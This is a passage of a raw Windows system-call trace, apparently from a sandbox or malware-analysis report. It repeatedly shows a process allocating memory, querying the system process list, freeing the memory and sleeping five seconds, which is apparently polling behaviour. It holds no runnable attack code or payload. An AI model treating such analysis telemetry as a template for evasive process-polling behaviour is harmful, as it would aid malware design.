BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.665] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.782] NtQuerySystemInformation (in: 